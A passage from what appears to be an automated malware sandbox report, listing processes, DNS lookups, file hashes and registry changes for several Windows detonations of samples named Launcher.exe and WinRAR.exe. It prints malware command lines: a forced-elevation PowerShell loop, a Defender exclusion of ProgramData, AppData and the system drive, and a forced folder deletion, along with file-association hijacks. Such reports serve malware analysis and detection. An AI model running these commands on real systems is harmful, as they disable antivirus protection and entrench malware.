rundll32.exe C:\Users\Admin\AppData\Local\Temp\data\BLAKEX64.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.200:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 18.53.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.35.223.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.126.166.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.134.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 182.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 27.73.42.20.in-addr.arpa | udp |
Files
Analysis: behavioral11
Detonation Overview
Submitted
2024-02-28 18:15
Reported
2024-02-28 18:24
Platform
win7-20240220-en
Max time kernel
117s
Max time network
124s
Command Line
Signatures
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\data\AppInfo\Xfh5GWnGPMjT.ps1
Network
Files
memory/2872-4-0x000000001B5E0000-0x000000001B8C2000-memory.dmp
memory/2872-5-0x0000000002790000-0x0000000002798000-memory.dmp
memory/2872-6-0x000007FEF5B40000-0x000007FEF64DD000-memory.dmp
memory/2872-7-0x00000000029C0000-0x0000000002A40000-memory.dmp
memory/2872-8-0x000007FEF5B40000-0x000007FEF64DD000-memory.dmp
memory/2872-9-0x00000000029C0000-0x0000000002A40000-memory.dmp
memory/2872-10-0x00000000029C0000-0x0000000002A40000-memory.dmp
memory/2872-11-0x000007FEF5B40000-0x000007FEF64DD000-memory.dmp
Analysis: behavioral14
Detonation Overview
Submitted
2024-02-28 18:15
Reported
2024-02-28 18:24
Platform
win10v2004-20240226-en
Max time kernel
129s
Max time network
168s
Command Line
Signatures
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\data\AppInfo\YwTGpGD7UtG1.ps1
C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x508 0x304
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 173.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 64.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.156.103.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.200:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.135.221.88.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 182.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 179.178.17.96.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.193.132.51.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ju2xhn0c.pin.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3768-0-0x00000261793E0000-0x0000026179402000-memory.dmp
memory/3768-10-0x00007FFA039B0000-0x00007FFA04471000-memory.dmp
memory/3768-11-0x0000026179460000-0x0000026179470000-memory.dmp
memory/3768-12-0x0000026179460000-0x0000026179470000-memory.dmp
memory/3768-15-0x00007FFA039B0000-0x00007FFA04471000-memory.dmp
Analysis: behavioral19
Detonation Overview
Submitted
2024-02-28 18:15
Reported
2024-02-28 18:24
Platform
win7-20240221-en
Max time kernel
120s
Max time network
144s
Command Line
Signatures
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\Launhcer.exe
"C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\Launhcer.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "$AdminRightsRequired = $true function Get-Win { while ($true) { # if ($AdminRightsRequired) { # try { Start-Process -FilePath '.\data\Launcher.exe' -Verb RunAs -Wait # break } catch { Write-Host 'Error 0xc0000906' } } else { # break } } } Get-Win"
C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\data\Launcher.exe
"C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\data\Launcher.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath $env:ProgramData, $env:AppData, $env:SystemDrive\ "
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /K rd /s /q "C:\Users\Admin\AppData\Roaming\services" & EXIT
Network
Files
memory/2876-0-0x00000000000E0000-0x00000000000E1000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Cab2010.tmp
| MD5 | ac05d27423a85adc1622c714f2cb6184 |
| SHA1 | b0fe2b1abddb97837ea0195be70ab2ff14d43198 |
| SHA256 | c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d |
| SHA512 | 6d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d |
C:\Users\Admin\AppData\Local\Temp\Tar2023.tmp
| MD5 | 9c0c641c06238516f27941aa1166d427 |
| SHA1 | 64cd549fb8cf014fcd9312aa7a5b023847b6c977 |
| SHA256 | 4276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f |
| SHA512 | 936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\94308059B57B3142E455B38A6EB92015
| MD5 | 753df6889fd7410a2e9fe333da83a429 |
| SHA1 | 3c425f16e8267186061dd48ac1c77c122962456e |
| SHA256 | b42dc237e44cbc9a43400e7d3f9cbd406dbdefd62bfe87328f8663897d69df78 |
| SHA512 | 9d56f79410ad0cf852c74c3ef9454e7ae86e80bdd6ff67773994b48ccac71142bcf5c90635da6a056e1406e81e64674db9584928e867c55b77b59e2851cf6444 |
C:\Users\Admin\AppData\Local\Temp\Tar24CF.tmp
| MD5 | dd73cead4b93366cf3465c8cd32e2796 |
| SHA1 | 74546226dfe9ceb8184651e920d1dbfb432b314e |
| SHA256 | a6752b7851b591550e4625b832a393aabcc428de18d83e8593cd540f7d7cae22 |
| SHA512 | ce1bdd595065c94fa528badf4a6a8777893807d6789267612755df818ba6ffe55e4df429710aea29526ee4aa8ef20e25f2f05341da53992157d21ae032c0fb63 |
memory/2868-77-0x0000000072DA0000-0x000000007334B000-memory.dmp
memory/2868-78-0x0000000072DA0000-0x000000007334B000-memory.dmp
memory/2868-79-0x0000000000300000-0x0000000000340000-memory.dmp
memory/2868-81-0x0000000000300000-0x0000000000340000-memory.dmp
memory/2868-102-0x0000000000300000-0x0000000000340000-memory.dmp
memory/1424-173-0x0000000000160000-0x0000000000161000-memory.dmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 08cf339d5ef943459b0a54846745db83 |
| SHA1 | eb206fafaf1dd09b40ff9d5517e881c238a6d3a2 |
| SHA256 | e9f91f3e65e42ba1832ac0af77ceaf761cda2c925a69ac84f5f610f31ee49da5 |
| SHA512 | a41096bed79ac14567152ff408a28f38dfa78d3a24497a262603b436d46c2aac066df6b7fcd97b538c700b3425126cfadfffab9572e0954540b9d13a495e41a2 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
| MD5 | 6fa8924728509d77424e759804abccb7 |
| SHA1 | fd4bf1afb94e6789491f0b608ea5f281ee5e201a |
| SHA256 | a920ace5c2fe8914bb9b2118dae20b86ff17255c86323824aa39a7505e0e0241 |
| SHA512 | b67bca50b243b2472d4df86f855e80383f6c78bf903ed11341932e65de0d17fc458263a055f5583f27f4311d1059aac071f0b2677e3d7834121a6734875d99d0 |
memory/1708-225-0x0000000072DA0000-0x000000007334B000-memory.dmp
memory/1708-234-0x0000000002490000-0x00000000024D0000-memory.dmp
memory/1708-292-0x0000000072DA0000-0x000000007334B000-memory.dmp
memory/2868-336-0x0000000072DA0000-0x000000007334B000-memory.dmp
memory/2868-337-0x0000000000300000-0x0000000000340000-memory.dmp
memory/2868-338-0x0000000000300000-0x0000000000340000-memory.dmp
memory/2868-340-0x0000000072DA0000-0x000000007334B000-memory.dmp
Analysis: behavioral21
Detonation Overview
Submitted
2024-02-28 18:15
Reported
2024-02-28 18:24
Platform
win7-20240221-en
Max time kernel
120s
Max time network
133s
Command Line
Signatures
Modifies system executable filetype association
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\PropertySheetHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA} | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\PropertySheetHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA}\ | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\WinRAR32 | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\WinRAR32\ = "{B41DB860-8EE4-11D2-9906-E49FADC173CA}" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\PropertySheetHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA} | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\PropertySheetHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA}\ | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\WinRAR | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\WinRAR\ = "{B41DB860-64E4-11D2-9906-E49FADC173CA}" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
Enumerates physical storage devices
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Main | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shellex\ContextMenuHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA}\ | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\PropertySheetHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA} | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\PropertySheetHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA}\ | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\WinRAR | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.REV | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\PropertySheetHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA} | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shellex\DropHandler | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shellex\DragDropHandlers\WinRAR32 | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\WinRAR32\ = "{B41DB860-8EE4-11D2-9906-E49FADC173CA}" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\DropHandler\ = "{B41DB860-64E4-11D2-9906-E49FADC173CA}" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\WinRAR\ = "{B41DB860-64E4-11D2-9906-E49FADC173CA}" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\ContextMenuHandlers | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\WinRAR32 | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shellex\ContextMenuHandlers\WinRAR32 | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\DragDropHandlers\WinRAR32 | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shellex\DragDropHandlers\WinRAR | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shell\open\command | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\data\\AppInfo\\services\\WinRAR.exe,0" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\PropertySheetHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA}\ | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\PropertySheetHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA}\ | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shellex\DropHandler\ = "{B41DB860-8EE4-11D2-9906-E49FADC173CA}" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\PropertySheetHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA} | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\ShellEx\ContextMenuHandlers\WinRAR\ = "{B41DB860-64E4-11D2-9906-E49FADC173CA}" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\DragDropHandlers\WinRAR\ = "{B41DB860-64E4-11D2-9906-E49FADC173CA}" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shell\open | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shellex\PropertySheetHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA} | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\WinRAR32\ = "{B41DB860-8EE4-11D2-9906-E49FADC173CA}" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\WinRAR32 | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\shellex\ContextMenuHandlers\WinRAR | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\ContextMenuHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA} | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shellex\PropertySheetHandlers | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\DropHandler | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shellex\PropertySheetHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA} | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\DragDropHandlers\WinRAR | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\ = "WinRAR archive" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shell\open | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\DefaultIcon | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.rev\ = "WinRAR.REV" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\ShellEx\ContextMenuHandlers\WinRAR32\ = "{B41DB860-8EE4-11D2-9906-E49FADC173CA}" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\ContextMenuHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA} | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shellex\ContextMenuHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA}\ | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shellex\PropertySheetHandlers\{B41DB860-64E4-11D2-9906-E49FADC173CA}\ | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shell\open\command | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\ContextMenuHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA}\ | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shellex\ContextMenuHandlers | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\lnkfile\shellex\ContextMenuHandlers\WinRAR | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\DefaultIcon | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.REV\shell\open\command | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.REV\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\data\\AppInfo\\services\\WinRAR.exe,1" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shellex\DropHandler\ = "{B41DB860-8EE4-11D2-9906-E49FADC173CA}" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR\shell\open\command\ = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\data\\AppInfo\\services\\WinRAR.exe\" \"%1\"" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\Temp\\data\\AppInfo\\services\\WinRAR.exe,0" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.rev | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shellex\PropertySheetHandlers\{B41DB860-8EE4-11D2-9906-E49FADC173CA} | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\WinRAR\ = "{B41DB860-64E4-11D2-9906-E49FADC173CA}" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Folder\ShellEx\DragDropHandlers\WinRAR\ = "{B41DB860-64E4-11D2-9906-E49FADC173CA}" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shell\open\command\ = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\data\\AppInfo\\services\\WinRAR.exe\" \"%1\"" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.REV\ = "RAR recovery volume" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\shellex | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\DragDropHandlers\WinRAR32\ = "{B41DB860-8EE4-11D2-9906-E49FADC173CA}" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.ZIP\ = "WinRAR ZIP archive" | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WinRAR.REV\shell | C:\Users\Admin\AppData\Local\Temp\data\AppInfo\services\WinRAR.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
